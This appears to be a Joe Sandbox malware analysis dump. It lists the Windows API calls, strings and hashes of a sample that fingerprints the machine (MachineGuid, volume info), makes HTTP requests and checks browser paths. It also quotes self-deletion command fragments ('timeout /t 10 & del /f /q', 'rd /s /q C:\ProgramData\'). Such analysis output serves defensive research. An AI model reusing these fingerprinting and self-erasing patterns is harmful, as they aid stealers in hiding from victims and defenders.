                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,001B670E,00000000,?,?), ref: 00191248
                                                                                                                                                                        • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00191285
                                                                                                                                                                        • wsprintfA.USER32 ref: 001912B2
                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 001912D1
                                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00191307
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0019131C
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,001B6E94), ref: 001913B1
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0019141B
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0019143B
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00191447
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                                                                                                        • String ID: - $%s\%s$?
                                                                                                                                                                        • API String ID: 2394436309-3278919252
                                                                                                                                                                        • Opcode ID: 43222b2c89ed64c7e449c4f1a21dc1b8a52f6a40ec5795af0ec5fb81b9f95eef
                                                                                                                                                                        • Instruction ID: ed0ffa347c40a2a681eec8d2fd8520ef091591f217b401ea7ac364c8994a7962
                                                                                                                                                                        • Opcode Fuzzy Hash: 43222b2c89ed64c7e449c4f1a21dc1b8a52f6a40ec5795af0ec5fb81b9f95eef
                                                                                                                                                                        • Instruction Fuzzy Hash: 8661A47590012C9BEF22EB14ED84EDABBB8EB59704F1086E6E509A6111DF30AEC5CF50
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 001982D8
                                                                                                                                                                        • _memset.LIBCMT ref: 001982E7
                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 001982FC
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                        • ShellExecuteEx.SHELL32(?), ref: 00198498
                                                                                                                                                                        • _memset.LIBCMT ref: 001984A7
                                                                                                                                                                        • _memset.LIBCMT ref: 001984B9
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 001984C9
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                        Strings
                                                                                                                                                                        • /c timeout /t 10 & del /f /q ", xrefs: 00198327
                                                                                                                                                                        • " & exit, xrefs: 0019841C
                                                                                                                                                                        • " & rd /s /q "C:\ProgramData\, xrefs: 00198375
                                                                                                                                                                        • " & exit, xrefs: 001983CB
                                                                                                                                                                        • /c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 001983D2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                                                                                                        • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                                                                                                                                        • API String ID: 2823247455-1079830800
                                                                                                                                                                        • Opcode ID: 60948c7921418fca2aef70d742cd3f695e49306cfc5a969c72455953f0eac02c
                                                                                                                                                                        • Instruction ID: 3812c79d959323432940628104a9dd717a34a0e429ea05cad779e153ff2b32af
                                                                                                                                                                        • Opcode Fuzzy Hash: 60948c7921418fca2aef70d742cd3f695e49306cfc5a969c72455953f0eac02c
                                                                                                                                                                        • Instruction Fuzzy Hash: BC51A5B1D402299BDF22EF64DC81ADDB7BCEB18704F4240E5A618B7152DB706F868F54
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 001909AA
                                                                                                                                                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001909EA
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00190A3F
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00190A46
                                                                                                                                                                        • wsprintfA.USER32 ref: 00190A7C
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,001B6E44), ref: 00190A8B
                                                                                                                                                                          • Part of subcall function 00191659: GetCurrentHwProfileA.ADVAPI32(?), ref: 00191674
                                                                                                                                                                          • Part of subcall function 00191659: _memset.LIBCMT ref: 001916A3
                                                                                                                                                                          • Part of subcall function 00191659: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 001916CB
                                                                                                                                                                          • Part of subcall function 00191659: lstrcatA.KERNEL32(?,001B6ED4,?,?,?,?,?), ref: 001916E8
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00190AA2
                                                                                                                                                                          • Part of subcall function 001923AA: malloc.MSVCRT ref: 001923AF
                                                                                                                                                                          • Part of subcall function 001923AA: strncpy.MSVCRT ref: 001923C0
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 00190AC5
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                         • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                        • String ID: :\$C$QuBi
                                                                                                                                                                        • API String ID: 1856320939-239756005
                                                                                                                                                                        • Opcode ID: c7f50d0b37c49aa5d96b22e4307c66c166b619410a60999605eee9dd274a47da
                                                                                                                                                                        • Instruction ID: 9b70dc3a3d9c1ed2989dab06057fa0f20f228d91542261ea346a2b6b61a744a3
                                                                                                                                                                        • Opcode Fuzzy Hash: c7f50d0b37c49aa5d96b22e4307c66c166b619410a60999605eee9dd274a47da
                                                                                                                                                                        • Instruction Fuzzy Hash: 62416E719452289BCB16AF789C85ADEBBBCEF19304F0000E6F549E7111D7708F958F91
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 00186963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 001869C5
                                                                                                                                                                          • Part of subcall function 00186963: StrCmpCA.SHLWAPI(?), ref: 001869DF
                                                                                                                                                                          • Part of subcall function 00186963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00186A0E
                                                                                                                                                                          • Part of subcall function 00186963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00186A4D
                                                                                                                                                                          • Part of subcall function 00186963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00186A7D
                                                                                                                                                                          • Part of subcall function 00186963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00186A88
                                                                                                                                                                          • Part of subcall function 00186963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00186AAC
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 0019695C
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00196967
                                                                                                                                                                          • Part of subcall function 00191DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00196973,?), ref: 00191E0C
                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,?), ref: 0019697C
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0019698B
                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 001969A4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                         • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                        • API String ID: 4174444224-1526165396
                                                                                                                                                                        • Opcode ID: 1c3bd6ac4ef41956937a902ddb009b3509decb157d4b6cffb7b397c4212c3e18
                                                                                                                                                                        • Instruction ID: 225f49f6d775fdf8d59101fed4700aaca18f976a09e8bfd70fdf5857c4e94c29
                                                                                                                                                                        • Opcode Fuzzy Hash: 1c3bd6ac4ef41956937a902ddb009b3509decb157d4b6cffb7b397c4212c3e18
                                                                                                                                                                        • Instruction Fuzzy Hash: AB21BE32E00215AFCF22BF74EC468AE7FB8AF24304B544065F819E7152DB39DE058B90
                                                                                                                                                                        APIs
                                                                                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0018EACE
                                                                                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0018EB2B
                                                                                                                                                                        • StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0018EDF2
                                                                                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0018EC08
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0018ECB8
                                                                                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0018ED15
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                         • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcpy
                                                                                                                                                                        • String ID: Stable\$ Stable\$firefox
                                                                                                                                                                        • API String ID: 3722407311-2697854757
                                                                                                                                                                        • Opcode ID: 9e8016a9f248b33fb593b2fa64ce9910f5d89a17dd96a7ae356060884291f47b
                                                                                                                                                                        • Instruction ID: 0c45b7766a015c300ca9df5e2d73b735fda4d47c07776a44c1bc668d93dd9f45
                                                                                                                                                                        • Opcode Fuzzy Hash: 9e8016a9f248b33fb593b2fa64ce9910f5d89a17dd96a7ae356060884291f47b
                                                                                                                                                                        • Instruction Fuzzy Hash: F4B15632D00109AFCF21FFA8ED47A9DBBB5AF64310F554160F914AB251DB30AF598B92
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 001915DC
                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 001915FB
                                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 00191620
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?), ref: 0019162C
                                                                                                                                                                        • CharToOemA.USER32(?,?), ref: 00191640
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CharCloseOpenQueryValue_memset
                                                                                                                                                                        • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                        • API String ID: 2235053359-1211650757
                                                                                                                                                                        • Opcode ID: 2618e36372a0d6bca2caf58052c6a0fdf8cb6c71fbb16e6761d854a49ac00fee
                                                                                                                                                                        • Instruction ID: f188c7ea36ac209c02cf17a63d4a8073a671ea2379cb081b73db3c7f7ef880ff
                                                                                                                                                                        • Opcode Fuzzy Hash: 2618e36372a0d6bca2caf58052c6a0fdf8cb6c71fbb16e6761d854a49ac00fee
                                                                                                                                                                        • Instruction Fuzzy Hash: 601121B590121DAFDB11EF60ED89EEABBBCEB14304F0001E5F615E6052D7749E888F10
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00193ED5,Windows: ,001B68A8), ref: 00190B19
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00193ED5,Windows: ,001B68A8), ref: 00190B20
                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,001B6890,?,?,?,00193ED5,Windows: ,001B68A8), ref: 00190B4E
                                                                                                                                                                        • RegQueryValueExA.KERNEL32(001B6890,00000000,00000000,00000000,000000FF,?,?,?,00193ED5,Windows: ,001B68A8), ref: 00190B6A
                                                                                                                                                                        • RegCloseKey.ADVAPI32(001B6890,?,?,?,00193ED5,Windows: ,001B68A8), ref: 00190B73
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
